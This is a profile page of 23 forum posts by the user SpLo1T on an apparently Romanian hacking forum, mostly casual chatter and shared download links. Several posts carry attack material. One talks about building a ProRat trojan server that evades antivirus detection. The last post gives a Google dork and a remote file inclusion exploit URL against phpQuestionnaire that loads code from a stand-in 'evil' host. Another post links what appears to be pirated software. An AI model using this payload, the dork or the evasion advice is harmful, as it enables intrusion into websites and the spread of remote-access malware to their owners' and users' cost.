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Everything posted by SpLo1T

  1. mie`mi place aia de la avatar`u lu kw3rln
  2. SpLo1T


    la o bere si noi ..nu vii si tu ? ...ce topic fain
  3. si nu dai si u o bere ca esti VIP ?
  4. Muhahaha va place url`u de redirectionare ?!
  5. mai bine taceai ...am zis eu undeva ca-s facute de mine !?
  6. aici asa e ...dar nici pe forum nu poate posta metoda ca o vad 1200 si ceva de useri ...eu cred ca ar fii bine sa se mai faca un grup cu userii de incredere in afara de VIP si Team member
  7. SpLo1T


    F1BDM7 , lamer < n00b right !?..oricum la 5 post-uri ai rank`ul n00b
  8. nu cred ca exista vreo versiune de prorat nedetectabila 100% ...se poate face un server d prorat 1.9 pe care Norton`u nu`l detecteaza decat Bitdefender si Nod il recunosc ca heuristic
  9. Options: Fake Idle Fake Webcam Headphones Open Talk Plugin
  10. -------------- L`am testat si ii fff bun
  11. bine ai venit Da_Boss , esti bine primit & spor la cat mai multe post-uri da` d calitate
  12. loooooooooooooooooooooooooooool cum sa taie ma degetu esti nebun !? dak t duci repede la spital il recuperezi plm...tre sa fii idiot sa renunti la un deget
  13. mdah...mai intai verifica cand postezi ceva ..nu mere nici-un link
  14. hehehe..ia cautati tiny XP SP2..are in jur de 103 mb uite un torrent
  15. nu folosesc hide ip e praf
  16. scara cand intri dai un add la warboy07 ..sa vb. ceva cu tine neaparat !
  17. aol rulz...cu hide ip dak ai firewall ori antivirus setat gresit...ramai tot pe real =)
  18. mah putzin asa da...dar cand am vazut acolo ca nu scrie data accidentului,numele,data...etc. nu prea mai avea farmec
  19. doamne cat de penala o fost faza )))))))
  20. mah scrie si u o descriere plm...
  21. Registry Repair Wizard scans the Windows registry and finds incorrect or obsolete information in the registry. By repairing these obsolete information in Windows registry, your system will run faster and error free. Registry Repair Wizard Features: * Automatic Registry Scanning and Cleanup * Backup and Restore the full Registry * Startup Organizer * IE BHO Organizer * Improve system performance * Remove Trojan which utilize startup items and IE BHO[/list:u] Repair and Clean Windows Registry Registry Repair Wizard not only cleans, but also organizes and streamlines your system registry, unclogging the gunk that life online leaves behind... Full Windows Registry Backup and Restore The full registry backup and restore feature let you backup the whole Windows registry and you can use it to restore your system to the previous state in case of any system failure... Defeat Internet Explorer Hijack and Homepage Hijack IE guard feature will defeat any browser hijack and homepage hijack problem by spyware and adware programs... http://rapidshare.de/files/31229878/Registry_Repair_Wizard_2006_v4.31.zip
  22. mah eu cum am mai zis cred ca ar trebui editat dupa Windowz XP Tiny sp 2 ..care e minunat
  23. google dork : "phpQuestionnaire v3" exploit : http://somehost/path_to_phpQuestionnaire/inc/ifunctions.php?GLOBALS[phpQRootDir]=http://evil
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